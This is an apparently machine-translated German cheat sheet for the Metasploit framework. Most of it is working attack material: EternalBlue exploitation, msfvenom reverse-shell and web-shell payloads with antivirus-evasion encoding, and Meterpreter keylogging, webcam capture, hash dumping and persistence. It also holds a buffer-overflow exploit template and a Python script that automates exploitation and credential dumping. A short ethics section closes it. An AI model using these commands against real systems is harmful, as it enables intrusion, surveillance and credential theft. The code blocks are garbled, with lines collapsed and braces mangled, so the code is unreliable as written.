Metasploit Cheat Sheet
Überblick
Metasploit ist das weltweit am weitesten verbreitete Penetrationstest-Framework, das eine umfassende Plattform für die Entwicklung, Prüfung und Ausführung von Exploit Code gegen entfernte Zielsysteme bietet. Ursprünglich von H.D. Moore erstellt und nun von Rapid7 aufrechterhalten, hat sich Metasploit in den de facto-Standard für Penetrationstests und Sicherheitsbewertung entwickelt, bietet eine umfangreiche Sammlung von Exploits, Nutzlasten, Encodern und Hilfsmodulen, die Sicherheitsexperten ermöglichen, Sicherheitslücken in verschiedenen Rechenumgebungen zu identifizieren, zu validieren und zu demonstrieren. Die modulare Architektur und umfangreiche Datenbank bekannter Exploits machen es zu einem unverzichtbaren Werkzeug für ethische Hacker, Sicherheitsforscher und Penetrationstester weltweit.
Die Kernkraft von Metasploit liegt in seinen umfassenden Entwicklungs- und Bereitstellungsfunktionen, die ein umfangreiches Repository bewährter Exploits mit ausgereiften Nutzlasterzeugungs- und Liefermechanismen kombinieren. Der Rahmen umfasst Tausende von Exploits, die auf verschiedene Betriebssysteme, Anwendungen und Netzwerkdienste abzielen, sowie Hunderte von Nutzlasten, die von einfachen Befehlsschalen bis hin zu fortschrittlichen persistenten Zugriffsmechanismen reichen. Die intelligenten Zielerkennungs- und Auswahlmöglichkeiten von Metasploit ermöglichen automatisierte Sicherheitsbewertungs-Workflows, während die fortschrittlichen Evasionstechniken und Kodierungsoptionen dazu beitragen, moderne Sicherheitskontrollen und Antivirensysteme zu umgehen.
Zu den unternehmenseigenen Features von Metasploit gehören verteilte Testfunktionen, umfassende Reporting- und Dokumentationstools, die Integration mit Schwachstellenscannern und Sicherheitsinformationssystemen sowie umfangreiche Anpassungsmöglichkeiten für spezialisierte Testszenarien. Das Framework unterstützt mehrere Schnittstellen, darunter Befehlszeilen, webbasierte und API-Zugriffe, wodurch die Integration mit automatisierten Sicherheitstest-Pipelines und benutzerdefinierten Sicherheitstools ermöglicht wird. Mit seiner aktiven Entwicklungsgemeinschaft, regelmäßigen Updates mit den neuesten Schwachstellen und Exploits, und bewährten Erfolgsbilanzen bei professionellen Sicherheitsbewertungen, bleibt Metasploit der Grundstein für Penetrationstests und Sicherheitsvalidierung in allen Größen.
Installation
Ubuntu/Debian Installation
Installieren von Metasploit auf Ubuntu/Debian Systemen:
```bash
Update system packages
sudo apt update && sudo apt upgrade -y
Install dependencies
sudo apt install -y curl wget gnupg2 software-properties-common
Add Rapid7 repository
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall
Alternative: Install from package
wget https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run chmod +x metasploit-latest-linux-x64-installer.run sudo ./metasploit-latest-linux-x64-installer.run
Install from source (development version)
sudo apt install -y git ruby ruby-dev build-essential zlib1g-dev \ libreadline-dev libssl-dev libpq-dev sqlite3 libsqlite3-dev \ libpcap-dev autoconf postgresql postgresql-contrib
Clone repository
git clone https://github.com/rapid7/metasploit-framework.git cd metasploit-framework
Install Ruby dependencies
gem install bundler bundle install
Initialize database
sudo systemctl start postgresql sudo systemctl enable postgresql sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Configure database
cat > config/database.yml << 'EOF' production: adapter: postgresql database: msf_database username: msf password: host: localhost port: 5432 pool: 5 timeout: 5 EOF
Initialize Metasploit database
./msfconsole -q -x "db_status; exit"
Verify installation
msfconsole --version ```_
CentOS/RHEL Installation
```bash
Install EPEL repository
sudo yum install -y epel-release
Install dependencies
sudo yum install -y curl wget git ruby ruby-devel gcc gcc-c++ \ make autoconf readline-devel openssl-devel zlib-devel \ postgresql postgresql-server postgresql-contrib
Initialize PostgreSQL
sudo postgresql-setup initdb sudo systemctl start postgresql sudo systemctl enable postgresql
Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall sudo ./msfinstall
Configure database
sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Verify installation
msfconsole --version ```_
macOS Installation
```bash
Install using Homebrew
brew install metasploit
Install dependencies
brew install postgresql brew services start postgresql
Create database
createuser -s msf createdb msf_database
Alternative: Install from installer
Download from https://www.metasploit.com/download
Run installer package
Verify installation
msfconsole --version ```_
Windows Installation
```bash
Download Windows installer
https://www.metasploit.com/download
Run installer as Administrator
Follow installation wizard
Install PostgreSQL
Download from https://www.postgresql.org/download/windows/
Configure database during installation
Verify installation
Open Command Prompt or PowerShell
msfconsole --version
Alternative: Install with Chocolatey
choco install metasploit
Configure Windows Defender exclusions
Add Metasploit installation directory to exclusions
```_
Docker Installation
Metasploit in Docker:
```bash
Pull official Metasploit image
docker pull metasploitframework/metasploit-framework
Run Metasploit console
docker run --rm -it metasploitframework/metasploit-framework
Run with persistent data
docker run --rm -it \ -v $(pwd)/msf_data:/home/msf/.msf4 \ metasploitframework/metasploit-framework
Create custom Dockerfile
cat > Dockerfile.metasploit << 'EOF' FROM metasploitframework/metasploit-framework
Install additional tools
USER root RUN apt-get update && apt-get install -y \ nmap \ nikto \ sqlmap \ && rm -rf /var/lib/apt/lists/*
Switch back to msf user
USER msf
Set working directory
WORKDIR /home/msf
CMD ["msfconsole"] EOF
Build custom image
docker build -f Dockerfile.metasploit -t metasploit-custom .
Run with network access
docker run --rm -it --net=host metasploit-custom ```_
Basisnutzung
Metasploit Console
Erste Schritte mit msfconsole:
```bash
Start Metasploit console
msfconsole
Basic commands
help # Show help version # Show version information exit # Exit console
Database commands
db_status # Check database connection db_connect # Connect to database db_disconnect # Disconnect from database db_rebuild_cache # Rebuild module cache
Workspace management
workspace # List workspaces workspace -a test # Add workspace workspace test # Switch to workspace workspace -d test # Delete workspace
Module management
show exploits # List all exploits show payloads # List all payloads show auxiliary # List auxiliary modules show post # List post-exploitation modules show encoders # List encoders show nops # List NOP generators
Search modules
search type:exploit platform:windows search cve:2017 search ms17-010 search apache ```_
Zielentdeckung
Ziele entdecken und scannen:
```bash
Network discovery with auxiliary modules
use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 run
Port scanning
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.100 set PORTS 1-1000 run
Service identification
use auxiliary/scanner/http/http_version set RHOSTS 192.168.1.100 run
SMB scanning
use auxiliary/scanner/smb/smb_version set RHOSTS 192.168.1.0/24 run
Database services
use auxiliary/scanner/mysql/mysql_version set RHOSTS 192.168.1.100 run
Web application scanning
use auxiliary/scanner/http/dir_scanner set RHOSTS 192.168.1.100 set DICTIONARY /usr/share/wordlists/dirb/common.txt run
Vulnerability scanning
use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run
Save scan results
db_nmap -sS -O 192.168.1.0/24 hosts # View discovered hosts services # View discovered services vulns # View discovered vulnerabilities ```_
Exploitation
Grundausbeutung Workflow:
```bash
Select exploit module
use exploit/windows/smb/ms17_010_eternalblue show options # Display required options show targets # Display available targets show payloads # Display compatible payloads
Configure exploit
set RHOSTS 192.168.1.100 set RPORT 445 set TARGET 0
Select payload
set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.50 set LPORT 4444
Verify configuration
show options check # Check if target is vulnerable
Execute exploit
exploit
or
run
Alternative: Use exploit command directly
exploit -j # Run as job exploit -z # Don't interact with session
Session management
sessions # List active sessions sessions -i 1 # Interact with session 1 sessions -k 1 # Kill session 1 sessions -K # Kill all sessions ```_
Nutzlasterzeugung
Generieren von eigenständigen Nutzlasten:
```bash
Generate Windows executable
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f exe -o payload.exe
Generate Linux executable
msfvenom -p linux/x86/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f elf -o payload.elf
Generate PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f raw -o shell.php
Generate PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -f psh -o payload.ps1
Generate Android APK
msfvenom -p android/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -o payload.apk
Encoded payloads (AV evasion)
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=192.168.1.50 LPORT=4444 \ -e x86/shikata_ga_nai -i 3 \ -f exe -o encoded_payload.exe
List available formats
msfvenom --list formats
List available encoders
msfvenom --list encoders
List available payloads
msfvenom --list payloads ```_
Erweiterte Funktionen
Meterpreter
Advanced Meterpreter Nutzung:
```bash
Basic Meterpreter commands
sysinfo # System information getuid # Current user getpid # Current process ID ps # Process list pwd # Current directory ls # List files cd /path # Change directory
File operations
download file.txt # Download file upload file.txt # Upload file edit file.txt # Edit file cat file.txt # Display file content rm file.txt # Delete file mkdir newdir # Create directory
System operations
shell # Drop to system shell execute -f cmd.exe -i # Execute command interactively migrate 1234 # Migrate to process ID 1234 kill 1234 # Kill process ID 1234 reboot # Reboot system shutdown # Shutdown system
Network operations
netstat # Network connections route # Routing table arp # ARP table portfwd add -l 8080 -p 80 -r 192.168.1.100 # Port forwarding
Privilege escalation
getsystem # Attempt privilege escalation getprivs # Get current privileges
Persistence
run persistence -X -i 10 -p 4444 -r 192.168.1.50
Information gathering
hashdump # Dump password hashes screenshot # Take screenshot webcam_snap # Take webcam photo record_mic # Record microphone keyscan_start # Start keylogger keyscan_dump # Dump keystrokes keyscan_stop # Stop keylogger
Registry operations (Windows)
reg queryval -k HKLM\Software\Microsoft\Windows\CurrentVersion -v ProductName reg setval -k HKLM\Software\Test -v TestValue -t REG_SZ -d "Test Data" reg deleteval -k HKLM\Software\Test -v TestValue
Background session
background # Background current session ```_
Post-Exploitation
Post-Exploitationsmodule:
```bash
Load post-exploitation module
use post/windows/gather/hashdump set SESSION 1 run
System information gathering
use post/windows/gather/enum_system use post/linux/gather/enum_system use post/osx/gather/enum_osx
Network enumeration
use post/windows/gather/enum_domain use post/windows/gather/enum_shares use post/multi/gather/enum_network
Credential harvesting
use post/windows/gather/credentials/windows_autologin use post/windows/gather/smart_hashdump use post/linux/gather/hashdump
Privilege escalation
use post/windows/escalate/getsystem use post/linux/escalate/cve_2021_4034
Persistence mechanisms
use post/windows/manage/persistence_exe use post/linux/manage/sshkey_persistence
Data exfiltration
use post/windows/gather/enum_files use post/multi/gather/firefox_creds use post/multi/gather/chrome_cookies
Lateral movement
use post/windows/gather/enum_domain_users use post/windows/gather/enum_computers ```_
Zusatzmodule
Einsatz von Hilfsmodulen für verschiedene Aufgaben:
```bash
Brute force attacks
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.1.100 set USER_FILE users.txt set PASS_FILE passwords.txt run
FTP brute force
use auxiliary/scanner/ftp/ftp_login set RHOSTS 192.168.1.100 set USERNAME admin set PASS_FILE passwords.txt run
HTTP brute force
use auxiliary/scanner/http/http_login set RHOSTS 192.168.1.100 set AUTH_URI /admin/login set USERNAME admin set PASS_FILE passwords.txt run
Database attacks
use auxiliary/scanner/mysql/mysql_login use auxiliary/scanner/mssql/mssql_login use auxiliary/scanner/postgres/postgres_login
Denial of service
use auxiliary/dos/tcp/synflood set RHOST 192.168.1.100 run
Information gathering
use auxiliary/gather/shodan_search set SHODAN_APIKEY your_api_key set QUERY "apache" run
Fuzzing
use auxiliary/fuzzers/http/http_form_field set RHOSTS 192.168.1.100 set URI /login.php run
SNMP enumeration
use auxiliary/scanner/snmp/snmp_enum set RHOSTS 192.168.1.0/24 run ```_
Benutzerdefinierte Module
Benutzerdefinierte erstellen Metasploit Module:
```ruby
Custom auxiliary module template
Save as ~/.msf4/modules/auxiliary/scanner/custom/my_scanner.rb
require 'msf/core'
class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Custom Scanner Module', 'Description' => 'Custom scanner for demonstration', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'http://example.com'] ], 'DisclosureDate' => '2023-01-01' ))
register_options([
Opt::RPORT(80),
OptString.new('URI', [true, 'URI to scan', '/']),
OptString.new('KEYWORD', [true, 'Keyword to search for', 'admin'])
])
end
def run_host(target_host) begin connect
request = "GET #\\\\{datastore['URI']\\\\} HTTP/1.1\r\n"
request << "Host: #\\\\{target_host\\\\}\r\n"
request << "Connection: close\r\n\r\n"
sock.put(request)
response = sock.recv(1024)
if response.include?(datastore['KEYWORD'])
print_good("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Found keyword: #\\\\{datastore['KEYWORD']\\\\}")
report_note(
host: target_host,
port: rport,
proto: 'tcp',
type: 'custom_scan',
data: "Keyword '#\\\\{datastore['KEYWORD']\\\\}' found"
)
else
print_status("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Keyword not found")
end
rescue ::Exception => e
print_error("#\\\\{target_host\\\\}:#\\\\{rport\\\\} - Error: #\\\\{e.message\\\\}")
ensure
disconnect
end
end
end
_ruby
Custom exploit module template
Save as ~/.msf4/modules/exploits/custom/my_exploit.rb
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Custom Exploit Module', 'Description' => 'Custom exploit for demonstration', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-0001'], ['URL', 'http://example.com'] ], 'Platform' => 'linux', 'Targets' => [ ['Linux x86', \\{ 'Ret' => 0x08048484 \\}] ], 'Payload' => \\{ 'Space' => 400, 'BadChars' => "\x00\x0a\x0d\x20" \\}, 'DisclosureDate' => '2023-01-01', 'DefaultTarget' => 0 ))
register_options([
Opt::RPORT(9999),
OptString.new('COMMAND', [true, 'Command to execute', 'id'])
])
end
def check begin connect sock.put("TEST\n") response = sock.recv(1024) disconnect
if response.include?("VULNERABLE")
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
rescue
return Exploit::CheckCode::Unknown
end
end
def exploit begin connect
buffer = "A" * 260
buffer << [target.ret].pack('V')
buffer << payload.encoded
print_status("Sending exploit buffer...")
sock.put(buffer)
handler
disconnect
rescue ::Exception => e
print_error("Exploit failed: #\\\\{e.message\\\\}")
end
end end ```_
Automatisierungsskripte
Automatisierte Penetration Testing Script
```python
!/usr/bin/env python3
Automated penetration testing with Metasploit
import subprocess import json import time import sys import os import argparse from datetime import datetime
class MetasploitAutomator: def init(self, msf_path="msfconsole"): self.msf_path = msf_path self.workspace = f"auto_test_\\{int(time.time())\\}" self.results = \\{\\}
def execute_msf_command(self, commands, timeout=300):
"""Execute Metasploit commands"""
if isinstance(commands, str):
commands = [commands]
# Create resource file
resource_file = f"/tmp/msf_commands_\\\\{int(time.time())\\\\}.rc"
with open(resource_file, 'w') as f:
for cmd in commands:
f.write(f"\\\\{cmd\\\\}\n")
f.write("exit\n")
try:
# Execute Metasploit with resource file
result = subprocess.run([
self.msf_path, "-q", "-r", resource_file
], capture_output=True, text=True, timeout=timeout)
# Clean up
os.remove(resource_file)
return result.stdout, result.stderr, result.returncode
except subprocess.TimeoutExpired:
print(f"Command timed out after \\\\{timeout\\\\} seconds")
return "", "Timeout", 1
except Exception as e:
print(f"Error executing command: \\\\{e\\\\}")
return "", str(e), 1
def setup_workspace(self):
"""Setup Metasploit workspace"""
commands = [
"db_status",
f"workspace -a \\\\{self.workspace\\\\}",
f"workspace \\\\{self.workspace\\\\}"
]
stdout, stderr, returncode = self.execute_msf_command(commands)
if returncode == 0:
print(f"Workspace '\\\\{self.workspace\\\\}' created successfully")
return True
else:
print(f"Failed to create workspace: \\\\{stderr\\\\}")
return False
def network_discovery(self, target_range):
"""Perform network discovery"""
print(f"Starting network discovery for \\\\{target_range\\\\}")
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"db_nmap -sn \\\\{target_range\\\\}",
"hosts -c address,name,os_name,purpose",
"services -c port,proto,name,state"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=600)
if returncode == 0:
print("Network discovery completed")
self.results['discovery'] = stdout
return True
else:
print(f"Network discovery failed: \\\\{stderr\\\\}")
return False
def vulnerability_scan(self, targets):
"""Perform vulnerability scanning"""
print(f"Starting vulnerability scan for \\\\{targets\\\\}")
scan_modules = [
"auxiliary/scanner/smb/smb_ms17_010",
"auxiliary/scanner/http/http_version",
"auxiliary/scanner/ssh/ssh_version",
"auxiliary/scanner/ftp/ftp_version",
"auxiliary/scanner/mysql/mysql_version"
]
commands = [f"workspace \\\\{self.workspace\\\\}"]
for module in scan_modules:
commands.extend([
f"use \\\\{module\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
"run",
"back"
])
commands.append("vulns")
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=1200)
if returncode == 0:
print("Vulnerability scan completed")
self.results['vulnerabilities'] = stdout
return True
else:
print(f"Vulnerability scan failed: \\\\{stderr\\\\}")
return False
def automated_exploitation(self, targets):
"""Perform automated exploitation"""
print(f"Starting automated exploitation for \\\\{targets\\\\}")
# Common exploits to try
exploits = [
\\\\{
'module': 'exploit/windows/smb/ms17_010_eternalblue',
'payload': 'windows/x64/meterpreter/reverse_tcp',
'port': 445
\\\\},
\\\\{
'module': 'exploit/linux/ssh/ssh_login',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 22
\\\\},
\\\\{
'module': 'exploit/multi/http/apache_struts2_content_type_ognl',
'payload': 'linux/x86/meterpreter/reverse_tcp',
'port': 80
\\\\}
]
successful_exploits = []
for exploit in exploits:
commands = [
f"workspace \\\\{self.workspace\\\\}",
f"use \\\\{exploit['module']\\\\}",
f"set RHOSTS \\\\{targets\\\\}",
f"set RPORT \\\\{exploit['port']\\\\}",
f"set PAYLOAD \\\\{exploit['payload']\\\\}",
"set LHOST 0.0.0.0", # Auto-detect
"set LPORT 4444",
"check",
"exploit -j", # Run as job
"sleep 10",
"sessions -l"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if "session" in stdout.lower() and "opened" in stdout.lower():
print(f"Successful exploitation with \\\\{exploit['module']\\\\}")
successful_exploits.append(exploit)
else:
print(f"Exploitation failed with \\\\{exploit['module']\\\\}")
self.results['exploits'] = successful_exploits
return len(successful_exploits) > 0
def post_exploitation(self):
"""Perform post-exploitation activities"""
print("Starting post-exploitation activities")
commands = [
f"workspace \\\\{self.workspace\\\\}",
"sessions -l",
"sessions -i 1", # Interact with first session
"sysinfo",
"getuid",
"ps",
"hashdump",
"background"
]
stdout, stderr, returncode = self.execute_msf_command(commands, timeout=300)
if returncode == 0:
print("Post-exploitation completed")
self.results['post_exploitation'] = stdout
return True
else:
print(f"Post-exploitation failed: \\\\{stderr\\\\}")
return False
def generate_report(self, output_file="metasploit_report.html"):
"""Generate comprehensive report"""
html_content = f"""
Metasploit Automated Penetration Test Report
Generated: \\\\{datetime.now().isoformat()\\\\}
Workspace: \\\\{self.workspace\\\\}
Executive Summary
- Successful Exploits: \\\\{len(self.results.get('exploits', []))\\\\}
- Vulnerabilities Found: \\\\{self.count_vulnerabilities()\\\\}
- Hosts Discovered: \\\\{self.count_hosts()\\\\}
Network Discovery Results
\\\\{self.results.get('discovery', 'No discovery data available')\\\\}
Successful Exploits
| Module | Payload | Port |
|---|---|---|
| \\\\{exploit['module']\\\\} | \\\\{exploit['payload']\\\\} | \\\\{exploit['port']\\\\} |
Vulnerability Scan Results
\\\\{\\\\}
Post-Exploitation Results
\\\\{\\\\}
Recommendations
- Patch all identified vulnerabilities immediately
- Implement network segmentation
- Deploy endpoint detection and response (EDR) solutions
- Conduct regular security assessments
- Implement multi-factor authentication
- Monitor network traffic for suspicious activities
""".format( self.results.get('vulnerabilities', 'No vulnerability data available'), self.results.get('post_exploitation', 'No post-exploitation data available') )
with open(output_file, 'w') as f:
f.write(html_content)
print(f"Report generated: \\\\{output_file\\\\}")
return output_file
def count_vulnerabilities(self):
"""Count vulnerabilities from scan results"""
vuln_data = self.results.get('vulnerabilities', '')
return vuln_data.count('Vulnerable') + vuln_data.count('VULNERABLE')
def count_hosts(self):
"""Count discovered hosts"""
discovery_data = self.results.get('discovery', '')
return discovery_data.count('address')
def cleanup(self):
"""Clean up workspace and sessions"""
commands = [
"sessions -K", # Kill all sessions
f"workspace -d \\\\{self.workspace\\\\}"
]
self.execute_msf_command(commands)
print("Cleanup completed")
def run_full_assessment(self, target_range, output_dir="/tmp/metasploit_assessment"):
"""Run complete automated assessment"""
print("Starting automated Metasploit assessment...")
# Create output directory
os.makedirs(output_dir, exist_ok=True)
try:
# Setup workspace
if not self.setup_workspace():
return False
# Network discovery
if not self.network_discovery(target_range):
return False
# Vulnerability scanning
if not self.vulnerability_scan(target_range):
return False
# Automated exploitation
self.automated_exploitation(target_range)
# Post-exploitation
self.post_exploitation()
# Generate report
report_file = os.path.join(output_dir, "metasploit_report.html")
self.generate_report(report_file)
print("Automated assessment completed successfully")
return True
except Exception as e:
print(f"Assessment failed: \\\\{e\\\\}")
return False
finally:
self.cleanup()
def main(): parser = argparse.ArgumentParser(description='Metasploit Automation') parser.add_argument('--target', required=True, help='Target range (e.g., 192.168.1.0/24)') parser.add_argument('--output', default='/tmp/metasploit_assessment', help='Output directory') parser.add_argument('--msf-path', default='msfconsole', help='Path to msfconsole')
args = parser.parse_args()
# Initialize automator
automator = MetasploitAutomator(args.msf_path)
# Run assessment
success = automator.run_full_assessment(args.target, args.output)
if success:
print("Assessment completed successfully")
else:
print("Assessment failed")
sys.exit(1)
if name == "main": main() ```_
Integrationsbeispiele
CI/CD Integration
```yaml
Jenkins Pipeline for Metasploit Integration
pipeline \\{ agent \\{ label 'security-testing' \\}
environment \\\\{
MSF_DATABASE_URL = 'postgresql: //msf:password@localhost/msf_database'
TARGET_NETWORK = '192.168.100.0/24'
\\\\}
stages \\\\{
stage('Setup Environment') \\\\{
steps \\\\{
script \\\\{
// Start PostgreSQL and initialize Metasploit
sh '''
sudo systemctl start postgresql
msfdb init
msfconsole -q -x "db_status; exit"
'''
\\\\}
\\\\}
\\\\}
stage('Network Discovery') \\\\{
steps \\\\{
script \\\\{
// Perform network discovery
sh '''
cat > discovery.rc << 'EOF'
workspace -a jenkins_test db_nmap -sn $\\{TARGET_NETWORK\\} hosts -o hosts.xml exit EOF msfconsole -q -r discovery.rc ''' \\} \\} \\}
stage('Vulnerability Assessment') \\\\{
steps \\\\{
script \\\\{
// Run vulnerability scans
sh '''
cat > vuln_scan.rc << 'EOF'
workspace jenkins_test use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS $\\{TARGET_NETWORK\\} run vulns -o vulns.xml exit EOF msfconsole -q -r vuln_scan.rc ''' \\} \\} \\}
stage('Generate Report') \\\\{
steps \\\\{
script \\\\{
// Generate security report
sh '''
python3 generate_msf_report.py \
--hosts hosts.xml \
--vulns vulns.xml \
--output security_report.html
'''
\\\\}
\\\\}
\\\\}
\\\\}
post \\\\{
always \\\\{
// Archive results
archiveArtifacts artifacts: '*.xml,*.html', fingerprint: true
// Publish report
publishHTML([
allowMissing: false,
alwaysLinkToLastBuild: true,
keepAll: true,
reportDir: '.',
reportFiles: 'security_report.html',
reportName: 'Security Assessment Report'
])
// Clean up
sh '''
msfconsole -q -x "workspace -d jenkins_test; exit"
rm -f *.rc *.xml
'''
\\\\}
failure \\\\{
// Send notification
emailext (
subject: "Security Assessment Failed: $\\\\{env.JOB_NAME\\\\} - $\\\\{env.BUILD_NUMBER\\\\}",
body: "Security assessment failed. Check console output for details.",
to: "$\\\\{env.SECURITY_TEAM_EMAIL\\\\}"
)
\\\\}
\\\\}
\\} ```_
Fehlerbehebung
Gemeinsame Themen
** Probleme der Datenbankverbindung:** ```bash
Check database status
msfconsole -q -x "db_status; exit"
Reinitialize database
msfdb delete msfdb init
Manual database setup
sudo -u postgres createuser -s msf sudo -u postgres createdb msf_database
Configure database connection
cat > ~/.msf4/database.yml << 'EOF' production: adapter: postgresql database: msf_database username: msf password: host: localhost port: 5432 pool: 5 timeout: 5 EOF ```_
Modul Belastungsprobleme: ```bash
Reload modules
msfconsole -q -x "reload_all; exit"
Check module paths
msfconsole -q -x "show advanced; exit"|grep ModulePath
Update Metasploit
msfupdate
Clear module cache
rm -rf ~/.msf4/store/modules_metadata.json ```_
Payload Generation Issues: ```bash
Check available encoders
msfvenom --list encoders
Test payload generation
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=127.0.0.1 LPORT=4444 \ -f exe --platform windows -a x86 \ -o test_payload.exe
Debug payload issues
msfvenom -p windows/meterpreter/reverse_tcp \ LHOST=127.0.0.1 LPORT=4444 \ -f raw|hexdump -C ```_
Leistungsoptimierung
Optimierung der Metasploit-Performance:
```bash
Database optimization
Edit postgresql.conf
sudo nano /etc/postgresql/*/main/postgresql.conf
Increase shared_buffers
shared_buffers = 256MB
Increase work_mem
work_mem = 4MB
Restart PostgreSQL
sudo systemctl restart postgresql
Metasploit optimization
Increase Ruby memory limit
export RUBY_HEAP_MIN_SLOTS=800000 export RUBY_HEAP_SLOTS_INCREMENT=300000 export RUBY_HEAP_SLOTS_GROWTH_FACTOR=1 export RUBY_GC_MALLOC_LIMIT=79000000
Start Metasploit with optimizations
msfconsole ```_
Sicherheitsüberlegungen
Operationelle Sicherheit
Legal und Ethische Nutzung: - Verwenden Sie Metasploit nur gegen Systeme, die Sie besitzen oder haben ausdrückliche Erlaubnis zu testen - Rechtliche Anforderungen an Penetrationstests in Ihrer Gerichtsbarkeit verstehen - Durchführung ordnungsgemäßer Berechtigungs- und Dokumentationsverfahren - Einschränkungen des Umfangs und Regeln des Engagements - Vertraulichkeit der entdeckten Schwachstellen bewahren
Datenschutz: - Verschlüsseln Sie Metasploit Datenbanken mit sensiblen Informationen - Umsetzung sicherer Datenschutzbestimmungen für Bewertungsergebnisse - Kontrolle des Zugriffs auf Ausbeutungswerkzeuge und Ergebnisse - Sichere Übermittlung von Bewertungsberichten und Erkenntnissen - Regelmäßige Reinigung von temporären Dateien und Sitzungsdaten
Defensive Überlegungen
** Erkennung und Prävention:** - Monitor für Metasploit Signaturen und Kompromissindikatoren - Implementierung von Netzwerk-Erkennungssystemen - Bereitstellung von Endpoint-Erkennungs- und Antwortlösungen - Regelmäßige Sicherheitsbewertungen und Sicherheitsmanagement - Sicherheitsbewusstseinstraining für Entwicklungs- und Betriebsteams
Referenzen
- Metasploit Offizielle Dokumentation
- Metasploit GitHub Repository
- [Metasploit Unleashed Course](https://__LINK_5___
- [Rapid7 Vulnerability Database](__LINK_5___
- (__LINK_5___)